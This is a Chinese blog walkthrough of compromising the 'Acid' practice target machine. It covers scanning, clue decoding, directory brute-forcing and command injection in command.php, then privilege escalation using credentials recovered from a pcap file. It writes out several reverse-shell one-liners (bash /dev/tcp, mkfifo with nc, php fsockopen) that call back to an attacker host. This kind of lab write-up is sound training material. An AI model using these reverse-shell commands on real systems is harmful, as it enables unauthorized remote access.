靶机实战-Acid

Acid靶机实战

1、主机发现

在这里插入图片描述
目标主机:192.168.232.160
我是用arp命令扫的,大家可自行选择

2、端口扫描

在这里插入图片描述

3、端口详细信息扫描

在这里插入图片描述

4、访问8080端口

在这里插入图片描述
只有一个文件,点击就会下载,先pass

5、访问33447端口

在这里插入图片描述
查看网页源代码:
在这里插入图片描述
发现一串16进制的数,转化成字符:
在这里插入图片描述
d293LmpwZw==
base64在转化://得到 wow.jpg
在这里插入图片描述
是张图片,找找网站有没有存放图片的路径:
在这里插入图片描述
把/wow.jpg加上看看
在这里插入图片描述
保存图片到本地,查看有没有隐藏什么信息,用Nodepad++打开。发现最后有一些数字,看着像16进制
在这里插入图片描述
然后利用txt把:替换为空
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
到这网页上的东西就解出来了,就一个图片
然后扫一下其它目录://kali中启动DirBuster,暴力破解web目录
在这里插入图片描述
在这里插入图片描述
扫描出来的 /Challenge 目录与上面网页的标题相对应,访问一下:
在这里插入图片描述
访问此目录下的php:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现cake.php中点一下login就会跳转到index.php登录页面,而且标题跟 /Challenge 标题格式是一样的,果断加到url后打开看看:
在这里插入图片描述
根据报错提示说明还是存在这个页面的,继续爆破一下目录看看有没有别的可以访问的页面:
在这里插入图片描述
发现了一个command.php页面,估计是直接命令执行的页面:
在这里插入图片描述
可以执行ping命令,利用bp抓包看看:
在这里插入图片描述
命令可执行,直接反弹shell:
kali开启监听:
在这里插入图片描述
尝试使用bash -i >& /dev/tcp/192.168.232.158/4444 0>&1反弹shell
在这里插入图片描述
不行,改url编码:
在这里插入图片描述
在这里插入图片描述
还是不行…
尝试使用
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.232.158 4444 >/tmp/f
在这里插入图片描述
在这里插入图片描述
也不行…
尝试使用
;php -r ‘$sock=fsockopen(“192.168.232.158”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’
在这里插入图片描述
在这里插入图片描述
点击go之后发现没有回包,去kali查看:
在这里插入图片描述
成功反弹shell

由于反弹shell的姿势多,一个不行就换,需要一个一个尝试

6、提权

查看/etc/passwd文件
在这里插入图片描述
重点关注的用户acid,saman
分别查看用户下的文件:
在这里插入图片描述
在这里插入图片描述
看到了第一条/sbin/raw_vs_isi/hint.pcapng,百度了一下是个能用Wireshark打开的流量抓包文件,下载下来打开看一下:
在这里插入图片描述
报错没有权限,执行su命令
在这里插入图片描述
必须在终端上运行,用python -c启动一个终端:
在这里插入图片描述
然后再执行scp那个命令:
在这里插入图片描述
用Wireshark打开:
在这里插入图片描述
发现用户名saman及密码1337hax0r
提权:
在这里插入图片描述
在这里插入图片描述
提权成功

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值